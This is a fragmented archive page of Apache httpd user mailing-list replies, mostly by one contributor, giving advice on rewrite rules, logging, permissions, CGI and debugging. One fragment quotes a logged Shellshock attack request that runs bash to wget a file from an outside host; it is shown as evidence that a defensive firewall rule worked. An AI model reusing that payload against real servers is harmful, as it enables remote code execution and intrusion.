g of HTTP requests when invoked via the CGI protocol.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ell scripts (that is, a program written
in sh/bash/ksh/zsh or similar languages that adhere to the POSIX 1003 shell
standard). That can only lead to much wasted time, bugs, and security
holes. Yes, it is technically possible to handle a HTTP POST request using
such a shell. But you shouldn't do
. Run
that now so you learn what to look for. Find the line that contains ":80"
in the local address column and "LISTEN" in the state column. Next to that
will be the PID and process name.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
hree days ago and
automatically blacklisted by my firewall because the HTTP request specified
an invalid HTTP "Host:" header.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
quot;-"
> "Apache/2.4.6 (Red Hat Enterprise Linux) PHP/5.4.16 (internal dummy
> connection)"
>
It's checking whether your web server allows the OPTIONS command which
might allow other forms of attacks to succeed. I strongly recommend
disallowing that HTTP command. Easiest
ot
given that you already had to grant the web server access to your home
directory in order to support your requirements. The concern now is whether
user accounts on your machine other than the one running the apache web
server can exploit those looser permissions.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ial information leak that could
theoretically be used to launch an attack. Whether that's a concern for you
depends on a lot of factors.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
he public execute bit is not set, or
the group execute but is not set or if set apache is not a member of that
group, or the user execute bit is not set or if set apache is not running
as that user.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ms before.
>
> I doubt whether Perdition can help me out on my current test ?
>
>
What is the relevance of the Perdition mail proxy to your current problem?
It seems to me to that you don't understand the difference between the SMTP
and HTTPD protocols. Which is why you should h
oftware).
> I expect keeping the Host clean for running VirtualBox ONLY.
>
Then you need another system that handles all traffic to/from your single
fixed/static IP address on which you can run a "reverse proxy" and forwards
traffic to the appropriate VMs on your VirtualBox host.
be relevant:
Changes with Apache 2.4.2
*) SECURITY: CVE-2012-0883 (cve.mitre.org)
envvars: Fix insecure handling of LD_LIBRARY_PATH that could lead to
the
current working directory to be searched for DSOs. [Stefan Fritsch]
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
Include any relevant configuration
options, error messages, and how to reproduce the problem.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
configurable values for ServerLimit, ThreadsPerChild, etc.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
arly have other
customizations in place since "which httpd" would not normally show the
output you reported. So it's possible your $PATH also contains atypical
entries that may cause httpd 2.2 to be found first even after you run "brew
link".
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
. The value logged by %L in the access log
cannot be found in the error log. The %L value is clearly a hash of some
sort (e.g., SHA1 value of the incoming IP address and port) converted to
ASCII. This looks like a bug to me.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
(null)
bytes. So if you want to capture binary data you'll want to use the fixed
version I attached to this problem report:
https://bz.apache.org/bugzilla/show_bug.cgi?id=57045
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
atic files. So I suspect there is something
unusual about your apache config that worked fine, possibly by accident,
under version 2.2 and results in incorrect output under version 2.4. Are
you using any third-party modules? Can you employ a "divide and conquer"
debug strategy to eliminate
cesses? It seems to me you're confusing a guideline (e.g., minimize the
number of processes per container) for a mandate (e.g., have only one
process per container).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
pect to recognizing
and dispatching incoming requests as well as dealing with housekeeping
chores may mandate one or more processes or threads for activities other
than handling a HTTP request.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
sses;
including the Apache HTTP server.
Take a look at your apachectl script for the equivalent block of code then
look at the contents of the file it refers to. You'll want to ensure you
have set and exported the same variables. Probably the easiest way is to
run the same "." (d
binary. If you choose to invoke the
httpd binary directly without the aid of a wrapper script it simply becomes
your responsibility to pass all necessary and appropriate arguments; e.g.,
-f to specify where the config file can be found.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
o
> that.
>
Works for me. Let us know if it doesn't work for you.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Sat, Oct 24, 2015 at 11:31 PM, Nick Kew wrote:
> On Sat, 2015-10-24 at 21:11 -0700, Kurtis Rader wrote:
> > I'm going to assume that by "single process" you meant "single user".
>
> If you read the docs, you'll find single process mode
> de
mailing list to know how to configure a Docker container to
die if the Apache HTTP server dies. Nor how to start an Apache HTTP server
daemon and have its output written to stdout and stderr in a manner that
can be collected by whatever software monitors the output of a Docker
virtual machine.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
tes
> libreport-plugin-kerneloops.x86_64 2.6.2-4.fc22 @updates
> [root@casablanca ~]#
>
> Here, the kernel 4.2.3-200.fc22 is installed and the machine according to
> uname -r booted from it.
>
> -
>
> Does the BIOS boot partition make the difference? Can anybody explain
> this strange behaviour?
>
> Thanks for your attention.
>
> suomi
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Fri, Oct 16, 2015 at 6:23 PM, Good Guy wrote:
> On 17/10/2015 01:41, Kurtis Rader wrote:
>
>>
>> That is not correct, Good Guy. Linux, and pretty much any operating
>> system, uses binary programs. Which means programs that consist of machine
>> executable op co
common directory for all the files you
need is root ("/").
P.S., There are very fringe, unusual, computers that directly execute byte
code for languages like Forth and Java rather than machine language as
typically understood by most CPUs. But even those systems are effectively
executing binaries.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
>
The [OR] on the second RewriteCond does nothing since it isn't followed by
another RewriteCond. You also don't need the first RewriteCond since by
definition an empty HTTP_REFERER won't match pattern.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
with whatever options meet
your requirements. For example, the install dir might be
/usr/local/apache24_testing or some such that exists on both of your
systems. Building from source on Linux is trivial (unlike on MS Windows).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
the file /data/apache/patch2.2/lib/libaprutil-1.so exist? Do the other
share object pathnames exist? If they exist run the "file" command against
them and the httpd binary. Are they all the same architecture? Especially,
are they all 32 or 64 bit binaries? If they're 64-bit binaries does the
system you're trying to run them on support 64-bit binaries?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ke ap_table with key value between modules. is it possible?
> Thanks.
>
You are unlikely to get an answer on this mailing list. Even though
developers (like myself) read this mailing list it isn't the correct forum
for such questions. Check out the "Third-Party Module Authors'
wrong with what you showed
us other than you probably should be using %{HTTP_HOST} and the RewriteRule
statement is needlessly complicated (but then so are most of the examples I
saw from the google search recommended).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
quot;
yields a bunch of results that suggest your running apache on FreeBSD.
Further, the setfib command runs a program with a specific routing table.
Presumably this has something to do with IP firewalls on FreeBSD. So asking
this question on a FreeBSD mailing list or forum is more likely to ge
ache http server is on Windo**ws machine.*
>
If you are trying to use a module that is not part of the core Apache HTTP
server and which is only available on MS Windows you should ask for help on
whatever mailing list or web site is devoted to supporting that module.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
>
> Please help me out here. This is very crucial for my project and deadline
> is already passed. :(
>
> Please let me know in case of any other queries.
>
> Thanks & Regards,
> *Ashish Mistry*
>
> --
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
rome/44.0.2403.157 Safari/537.36"
>
The common log format (CLF), which is the default, leaves a lot to be
desired. I highly recommend using a CustomLog format that includes, at a
minimum, "%{Host}i" so that the client provided HTTP host header is part of
the log message. This is what
.example.com:80
>
> My DNS has A records
>
> example.com -> myIP
> *.example.com -> myIP
>
> myIP is the same for both records.
>
> site1.example.com works fine and goes to the correct site.
>
> site2.example.com <http://site1.example.com> works fine and
only provides static content. A lower value (in the single digits) might,
if you're lucky, mitigate a DDOS attack enough to keep your server from
melting down.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
one request ended up in 200 lines of
> garble (I cleared the log beforehand).
>
That is often the case. Which is why it is important to perform one
experiment at a time; i.e., issuing one client request then saving the log
files for analysis. If you do not minimize the number of variables (e.
by "correctly on /app"? Nowhere in the data you've
provided so far, in particular the Apache virtual host configuration, is a
URI prefix of "/app" referenced. If you're using that as a synonym for
"/projects/CS32Brewer" please say so.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
. For example,
LoadModule dumpio_module libexec/apache2/mod_dumpio.so
LogLevel trace6
DumpIOInput On
DumpIOOutput On
LogLevel dumpio_module:trace7
I then issue a series of carefully constructed HTTP requests meant to
eliminate irrelevant details and examine the error log for clues.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
configuration of the
program. As far as I know the Apache httpd project adheres to that rule.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
equests the app makes"? Is it a
web browser or something else? And if something else please provide more
details. What do you mean by "the remote IP address is shown as
localhost:80"? Shown where? By what program?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
n other words the flow of requests and
responses is not clear from your description.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
t what is passed to the subprocess. I
would open a second issue asking that the documentation make it clear when
directives like DocumentRoot have the side effect of setting an environment
variable.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
tpd.apache.org/docs/2.4/mod/core.html#documentroot ) doesn't even
mention the corresponding env var. I think that's a documentation bug.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
d.apache.org/docs/2.4/mod/mod_cgi.html which in turn links to
the official specification at http://www.ietf.org/rfc/rfc3875.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
pecially in a well
written program like Apache HTTPD. A well written program will normally
check whether the open (or any syscall which returns a file descriptor)
failed and refuse to use the -1 value as if it were a valid file descriptor
number. So I would be surprised if increasing that value resol
As user2 repeat the ls command:
ls -l /test/file
You should get a "permission denied" error.
As user1 restore the "x" permission and remove the "r" permission from the
directory:
chmod 511 /test
As user2 repeat the ls command:
ls -l /test/file
It should work this time.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
d posting to
> stackoverflow, and the best idea given was creating a symlink in the
> container. Is there a way to do this officially?
>
> http://stackoverflow.com/posts/32013582
>
FYI, That URL isn't valid; it results in a "page not found" error from
Stack Overflow.
--
apache2/test-access.log.%Y-%m-%d 86400 " krader_custom
ErrorLog "|/usr/sbin/rotatelogs -c -f -l -L
/private/var/log/apache2/test-error.log
/private/var/log/apache2/test-error.log.%Y-%m-%d 86400"
Obviously you'll want to substitute another program for
/usr/sbin/rotatelogs in the
nsultant to help you with these issues. It's
only because your questions up to this point have had fairly obvious
answers and didn't require actual knowledge of your web server environment
that we could help.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
s. Information is passed to
them from the web server via environment variables and, for POST requests,
standard input. You pass arguments to a CGI script via the URI query
string. See https://en.wikipedia.org/wiki/Common_Gateway_Interface
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
try for the most recent attack the above rule caught (I
have a custom log format):
2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616
194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c \"wget -O
/tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\""
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
James, keep in mind that in a given context (e.g., a .htaccess file) all of
the directives are parsed and processed before being applied to the current
request. So, as Zimmi points out, having more than one RewriteEngine
doesn't make any sense. The same is true for RewriteBase.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
&ref=books'
so it's hard to know exactly what is happening.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
a.com left intact
Okay, the Apache documentation says that the Redirect directive has
precedence over Alias and ScriptAlias directives. It doesn't say anything
about RewriteRule directives. But I'm willing to bet that's the problem
since it would be strange to use both RewriteRule and Re
y/?testing=123" do you get a 403 Forbidden
status in response?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
line at the top of your .htaccess? If
not try adding one. You probably also want "RewriteBase /" as the next line.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
me section
were working. It was just this one rule that wasn't working. Which is it?
At this point you should probably include your entire .htaccess and
httpd.conf files (stripped of anything sensitive like paths to security
certificates) as attachments.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ug logging. Use tools like
the curl command to execute the HTTP requests so that you have total
control over the URI and headers being passed to your server.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Sat, Jun 27, 2015 at 1:58 PM, James Moe wrote:
> On 06/27/2015 12:00 PM, Kurtis Rader wrote:
> >
> >
> I guess this build did not include dumpio_module. Adding the above
> produced no additional logging.
Did you add or uncomment the appropriate LoadModule line?
;s what I use to debug situations like this. Which is fine for short
durations. But for longer term tracking of requests to your server it's
better, and less resource intensive, if you simply define a CustomLog that
includes the "%r" format string so that the entire URI ends up in the
access log.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
?
A "Referer:" header is not the URI sent to the web server. It's typically
added by the web browser to indicate the URI from which the request
originated. Your error log should include the entire URI, including query
string, sent to your server.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
06-26T18:01:39 1435366899.344840 200 - 228749 61272 ::1 localhost "GET
/?app=ecom&ns=catshow&ref=books HTTP/1.1" "curl/7.37.1"
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
e the rewrite rule in the wrong container (i.e., server, location,
directory, virtual host).
P.S., If you want to match the query string literally rather than as a
pattern which matches a subset of the query string you should preface the
pattern with an equal-sign:
RewriteCond %{QUERY_STRING} =
On Fri, Jun 26, 2015 at 1:36 PM, Kurtis Rader wrote:
> My question for James would be how do you know the query string has the
> parameters in that exact order? Unless the query string has been
> hand-crafted you cannot assume the parameters will appear in any specific
> order
e the parameters will appear in any specific
order. Also, your pattern doesn't handle the case where the parameters are
separated by semicolons (which is a legal alternative to ampersand). In
general matching against QUERY_STRING is very difficult to do in a robust
manner.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ft from the Ubuntu upgrade is
interfering. You may need to remove packages then manually remove any
unexpected files related to those packages that are still in the filesystem
before retrying the install.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
lematic on MS-Windows due to how CLI arguments
are parsed. I strongly recommend using only forward slashes in file paths
whenever possible and never mix forward and back slashes as path separators.
P.S., This type of problem is a good example of why you want to avoid
"shelling out" to a
ustralia?
Because that would yield a local timestamp of 786326400, 1994-12-02
00:00:00 local time. I would recommend searching for values in the
range 786297600
+/- n * 3600 for n in -12+12.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
press_test_cookie=WP+Cookie+check
```
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
rule like this
RewriteCond %{QUERY_STRING} !=""
RewriteRule ^ %{REQUEST_URI}? [R=302,L]
When I issue a "GET /hello.php?whatever=1" with either version I get a 302
response with
Location: http://www.skepticism.us/hello.php
Also, if you don't want to match non-whitespace I recommend
convinced you that implementing this logic in the web
server is the wrong place to do it then I would recommend ModSecurity:
http://www.modsecurity.org/.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
exceeded."""
now = time.time()
time_delta = now - self.last_check
self.last_check = now
self.allowance += time_delta * self.ratio
if self.allowance > self.rate:
self.allowance = int(self.rate) # throttle
if self.al
ystems) but verified it with my MS-Windows
Vista virtual machine. There is probably a GUI (graphical user interface)
means of ascertaining the same data but I have no idea how to do so since I
generally prefer old-school CLI methods.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
76 matches
Mail list logo
